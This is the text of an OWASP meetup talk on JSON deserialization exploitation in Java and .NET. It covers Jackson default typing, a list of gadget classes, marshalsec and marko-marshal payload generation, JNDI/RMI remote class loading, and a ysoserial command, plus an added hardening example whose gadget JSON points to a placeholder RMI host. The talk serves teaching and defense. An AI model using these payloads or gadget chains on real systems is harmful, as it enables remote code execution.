OWASP Stammtisch Dresden - JSON Deserialization - 10.08.2018
JSON Deserialization Exploitation
RCE by Design

Contents
1. Introduction
2. Basics
3. Exploitation
4. Summary / Further Research
Introduction
DefCon 2017, "Friday the 13th: JSON Attacks" [1]. The slides quite rightly point out that 2016 was the "year of the Java Deserialization Apocalypse". In the age of RESTful APIs and microservice architecture, the transmission of objects shifts to a JSON or XML serialized form. Is the use of JSON or XML any more secure?
Moritz Bechler published a paper about deserialization vulnerabilities (focused on Java JSON and XML) [5].
.NET serialization libraries are affected as well [6].
OWASP Top 10 2017 RC2 [7] ranked insecure deserialization in eighth place.
Basics

Dummy.json:

    {
      "id": 1338,
      "object": "Test"
    }

Parsing helper and target class from the slide (Jackson). enableDefaultTyping() is the setting that lets the JSON choose which class is instantiated for the Object field:

    import java.io.IOException;
    import com.fasterxml.jackson.core.JsonParser;
    import com.fasterxml.jackson.databind.ObjectMapper;

    // default method, i.e. declared in an interface (the enclosing interface is not shown on the slide)
    default <T> T parseJackson(Class<T> clazz, String json) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();   // global polymorphic typing: the JSON may carry class names
        mapper.configure(JsonParser.Feature.ALLOW_UNQUOTED_FIELD_NAMES, true);
        T object = mapper.readValue(json, clazz);
        return object;
    }

    public class Dummy {
        public int id;
        public Object object;   // java.lang.Object: any type id is accepted once default typing is on

        public int getId() {
            return id;
        }
        // remaining accessors cut off on the slide
    }
JSON marshallers have to reconstruct the object using only the details present in the JSON data. The unmarshaller creates a new object (allocates space in memory) using the default (parameterless) constructor and then uses reflection to populate all fields or property members. In practice JSON libraries reconstruct objects by one of:
- calling the default constructor and using reflection to set field values
- calling the default constructor and calling setters to set field values
- calling "special" constructors, type converters or callbacks
- calling common methods such as hashCode(), toString(), equals(), finalize(), ...
JSON libraries invoke setters to populate object fields. [5] and [6] focused their analysis on finding types with setters that could lead to arbitrary code execution (Java and .NET).
Libraries analysed in [5] and [6]:

    Library                      Language   Technology
    FastJSON                     .NET       JSON
    Json.Net                     .NET       JSON
    FSPickler                    .NET       JSON
    Sweet.Jayson                 .NET       JSON
    JavascriptSerializer         .NET       JSON
    DataContractJsonSerializer   .NET       JSON
    Jackson                      Java       JSON
    Genson                       Java       JSON
    JSON-IO                      Java       JSON
    FlexSON                      Java       JSON
    SnakeYAML                    Java       YAML
    jYAML                        Java       YAML
    YamlBeans                    Java       YAML
    Apache Flex BlazeDS          Java       AMF4
    Red5 IO AMF                  Java       AMF
    Castor                       Java       XML
    Java XMLDecoder              Java       XML
    Java Serialization           Java       binary
    Kryo                         Java       binary
    Hessian/Burlap               Java       binary/XML
    XStream                      Java       XML/various
Basics - Gadgets/Payloads
Gadgets for bean-property based marshallers: these marshallers call setter methods, which means that far more code can be triggered directly during unmarshalling.

com.sun.rowset.JdbcRowSetImpl
java.util.ServiceLoader$LazyIterator
com.sun.jndi.rmi.registry.BindingEnumeration
com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl
javax.imageio.ImageIO$ContainsFilter
Commons Configuration JNDIConfiguration
C3P0 JndiRefForwardingDataSource
C3P0 WrapperConnectionPoolDataSource
Spring Beans PropertyPathFactoryBean
Spring AOP PartiallyComparableAdvisorHolder
Spring AOP AbstractBeanFactoryPointcutAdvisor
Spring DefaultListableBeanFactory
Apache XBean
Caucho Resin
javax.script.ScriptEngineManager
Commons Beanutils BeanComparator
ROME EqualsBean/ToStringBean
Groovy Expando/MethodClosure
sun.rmi.server.UnicastRef(2)
java.rmi.server.UnicastRemoteObject
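Added example, not from the slides and not marshalsec's code: the vulnerable Jackson configuration from the Basics slide next to two hardened variants, fed a constructed payload in the [type-id, value] shape Jackson's default typing expects, naming the JdbcRowSetImpl gadget from the list above. The class name DefaultTypingDemo, the package prefix com.example.model, the Payload/Note types and the host attacker.example are assumed for illustration; the file needs jackson-databind 2.10 or newer (PolymorphicTypeValidator). The gadget JSON is only ever handed to the hardened mappers, which reject the type id before any class is instantiated, so no setter and no JNDI lookup runs.

```java
import com.fasterxml.jackson.annotation.JsonSubTypes;
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

// Added example (not from the slides or marshalsec). Requires jackson-databind 2.10+.
public class DefaultTypingDemo {

    // Same target class as on the Basics slide: the java.lang.Object field is the sink.
    public static class Dummy {
        public int id;
        public Object object;
    }

    // (1) Vulnerable: the configuration from the slide. With global default typing the
    // JSON may name any class on the classpath for the Object field, which is what the
    // gadget list above exploits (a bean setter that performs a JNDI lookup).
    static ObjectMapper vulnerableMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // deprecated since 2.10 but still compiles
        return mapper;
    }

    // (2) Hardened while keeping default typing: a type id is only resolved if it falls
    // under an allow-listed package. "com.example.model." is an assumed name standing in
    // for the application's own model package.
    static ObjectMapper allowListMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    // (3) Hardened, preferred: no default typing at all. Polymorphism is declared per
    // field with logical names, so Java class names never appear in the JSON.
    @JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
    @JsonSubTypes({ @JsonSubTypes.Type(value = Note.class, name = "note") })
    public interface Payload {}

    public static class Note implements Payload {
        public String text;
    }

    public static class SafeDummy {
        public int id;
        public Payload object; // a closed set of subtypes instead of Object
    }

    public static void main(String[] args) throws Exception {
        // Constructed input in the [type-id, value] wrapper shape Jackson default typing
        // reads, naming the JdbcRowSetImpl gadget from the list above. attacker.example is
        // a placeholder host. This string is only fed to the hardened mappers.
        String gadgetJson = "{\"id\": 1338, \"object\": [\"com.sun.rowset.JdbcRowSetImpl\", "
                + "{\"dataSourceName\": \"rmi://attacker.example:1069/Exploit\", \"autoCommit\": true}]}";
        String benignJson = "{\"id\": 1338, \"object\": \"Test\"}"; // Dummy.json from the slide

        // Benign input is accepted by every configuration; strings need no type id.
        Dummy d = vulnerableMapper().readValue(benignJson, Dummy.class);
        System.out.println("vulnerable mapper, benign input: id=" + d.id + " object=" + d.object);

        // (2): the type id is rejected before the class is instantiated, so no setter runs.
        try {
            allowListMapper().readValue(gadgetJson, Dummy.class);
            System.out.println("unexpected: gadget type id was resolved");
        } catch (InvalidTypeIdException e) {
            System.out.println("allow-list rejected type id: " + e.getTypeId());
        }

        // (3): a plain mapper only knows the logical name "note"; a class name is unknown.
        ObjectMapper plain = new ObjectMapper();
        try {
            plain.readValue(gadgetJson, SafeDummy.class);
            System.out.println("unexpected: gadget type id was resolved");
        } catch (InvalidTypeIdException e) {
            System.out.println("explicit subtypes rejected: " + e.getMessage());
        }
        SafeDummy ok = plain.readValue(
                "{\"id\": 1, \"object\": {\"type\": \"note\", \"text\": \"hello\"}}", SafeDummy.class);
        System.out.println("explicit subtypes accepted: " + ((Note) ok.object).text);
    }
}
```

Variant (3) is the one to aim for: the allow-list in (2) still lets the input pick any class under the trusted prefix, so a gadget inside your own model package would still be reachable, whereas a closed @JsonSubTypes set is reviewable in one place.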
Exploitation
Moritz Bechler published a payload generator based on his previous work: https://github.com/mbechler/marshalsec/

Payload generation via marshalsec (-a: all gadget types, -v: verbose):

    java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -a -v
    java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -a -v
Payload generation via marko-marshal [8]:

    URI jndiUrl = new URI("rmi://localhost:1069/Exploit");
    Configuration c = Configuration.create()
        .all(true)
        .codebase("http://localhost:31337/")
        .codebaseClass("Exploit.class")
        .JNDIUrl(jndiUrl)
        .escapeType(EscapeType.NONE)
        .executable("C:\\Windows\\notepad.exe", "")
        .gadgetType(GadgetType.SpringPropertyPathFactory)
        .build();
    MarshalsecFactory factory = new MarshalsecFactory(c);
    List<...> payloads = factory....;   // call cut off on the slide
    payloads.forEach(System.out::println);
JNDI Exploitation - Basics
JNDI (Java Naming and Directory Interface) is the Java API for interacting with naming and directory services. It offers a single common interface to disparate naming and directory services such as:
- Remote Method Invocation (RMI)
- Lightweight Directory Access Protocol (LDAP)
- Active Directory
- Domain Name System (DNS)
- Common Object Request Broker Architecture (CORBA)
- etc.
JNDI Exploitation - Basics [9]
The Java Virtual Machine (JVM) allows loading of custom classes from a remote source, the codebase named in a JNDI Reference, without any restrictions. That is why a JNDI lookup URL reachable through a setter is enough for a gadget: the name resolves to a Reference pointing at an attacker-hosted factory class, which the JVM downloads and instantiates.
RMI Exploitation [9] - Java Remote Method Invocation (two diagram slides; the figures are not reproduced here)
RMI Exploitation - Limitation
Java 8u121 finally added that codebase restriction (com.sun.jndi.rmi.object.trustURLCodebase now defaults to false), but only for RMI at this point. LDAP references were still loaded from remote codebases until Java 8u191, released after this talk, introduced com.sun.jndi.ldap.object.trustURLCodebase with the same default. On the JVMs you operate, check that neither property is set to true.
DEMO TIME
[10] https://github.com/no-sec-marko/java-web-vulnerabilities
All serializers need to reconstruct objects and will normally invoke methods while doing so. The problem is not limited to Java (e.g. BinaryFormatter in .NET):

    ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19" > execute-ping.txt

Source: https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
Summary / Further Work
- JSON is not safe per se: a JSON library that resolves type names from the input is as dangerous as native serialization.
- Security by design: identify the use of known vulnerable components, e.g. https://www.cvedetails.com/cve/CVE-2017-9805/ (Apache Struts 2 REST plugin, XStream).
- Other libraries? (Vert.x)
- Burp plugin (Burp Collaborator)